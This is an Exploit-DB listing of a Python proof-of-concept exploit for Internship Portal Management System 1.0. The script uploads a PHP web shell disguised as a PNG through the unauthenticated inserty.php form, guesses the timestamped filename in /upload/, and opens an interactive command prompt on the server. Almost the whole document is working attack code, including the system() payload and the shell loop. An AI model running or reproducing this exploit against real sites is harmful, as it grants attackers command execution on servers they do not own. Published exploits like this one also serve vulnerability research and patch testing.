Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)

EDB-ID:

49823

CVE:

N/A




Platform:

PHP

Date:

2021-05-04


# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10

import requests
import time

#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
 "http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'

#the upload point
insert_url=url+"/inserty.php"

def fill_details():
    global payload
    global shellend
    global shellstart
    print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
    #time start
    shellstart=int(time.time())
    #print(shellstart)
    files  = {'file':('shell.php',payload,
                    'image/png', {'Content-Disposition': 'form-data'}
                  )
              }
    data = {
            "company_name":"some",
            "first_name":"some",
            "last_name":"some",
            "email":"some@some.com",
            "gender":"Male",
            "insert_button":"Apply",
            "terms":"on"
    }
    r = requests.post(insert_url, data=data, files=files)
    if r.status_code == 200:
        print("Exploited Intern System Successfully...")
        shellend = int(time.time())
        #print(shellend)
        shell()
    else:
        print("Exploit Failed")

def shell():
    for shellname in range(shellstart, shellend+1):
        shellstr=str(shellname)
        shell_url=url+"/upload/"+shellstr+"_shell.php"
        r = requests.get(shell_url)
        if r.status_code == 200:
            shell_url=url+"/upload/"+shellstr+"_shell.php"
            break
    
    r = requests.get(shell_url)
    if r.status_code == 200:
        print("Shell Starting...")
        while True:
            cmd=input("cmd$ ")
            r = requests.get(shell_url+"?cmd="+cmd)
            print(r.text)
    else:
        print("File Name Error")


fill_details()